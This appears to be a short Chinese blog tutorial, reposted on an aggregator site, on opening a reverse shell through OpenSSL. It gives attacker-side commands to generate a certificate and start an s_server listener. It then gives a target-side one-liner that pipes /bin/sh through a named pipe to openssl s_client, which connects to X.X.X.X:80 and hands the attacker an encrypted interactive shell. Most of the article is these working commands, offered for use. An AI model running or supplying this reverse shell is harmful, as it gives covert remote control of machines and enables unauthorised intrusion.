当前位置: 首页 > news >正文

使用OpenSSL的反弹shell

news 2025/7/8 3:32:01

1、攻击机生成证书:

 openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

生成证书

2、攻击机开启服务

openssl s_server -quiet -key key.pem -cert cert.pem -port 80

3、靶机连接命令

mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect X.X.X.X:80 > /tmp/s; rm /tmp/s

4、实现效果

攻击机可进行命令执行
攻击机

靶机交出控制权
靶机

其他反弹shell命令

参见我的其他文章

http://www.lryc.cn/news/192374.html

相关文章:

  • 竞赛选题 深度学习OCR中文识别 - opencv python
  • ezEIP信息泄露
  • 02.机器学习原理(复习)
  • 电源集成INN3270C-H215-TL、INN3278C-H114-TL、INN3278C-H215-TL简化了反激式电源转换器的设计和制造。
  • UE4和C++ 开发--HUD类
  • 使用js怎么设置视频背景
  • Gin,Gorm实现Web计算器
  • 11-网络篇-DNS步骤
  • 设计师都应该知道的事:极简主义家具该怎么去用
  • 设计模式02———建造者模式 c#
  • 2023最新接口自动化测试面试题
  • GaN器件的工作原理
  • 点云从入门到精通技术详解100篇-海量三维点云的空间索引及可视化应用(续)
  • androidx和v4包资源冲突解决方法
  • 【发烧期间随笔】第一次游戏开发经历的总结与反思
  • CCombBox组合框
  • 机器学习-有监督学习-神经网络
  • React之组件通信
  • 什么是微服务架构
  • <%=%>模板写法
  • python爬取boss直聘数据(selenium+xpath)
  • GEO生信数据挖掘(六)实践案例——四分类结核病基因数据预处理分析
  • 8.Mobilenetv2网络代码实现
  • Spring Boot Controller
  • 在网络安全、爬虫和HTTP协议中的重要性和应用
  • Web测试框架SeleniumBase
  • jvm打破砂锅问到底- 为什么要标记或记录跨代引用
  • 小程序长期订阅
  • Studio One6.5中文版本版下载及功能介绍
  • 07-Zookeeper分布式一致性协议ZAB源码剖析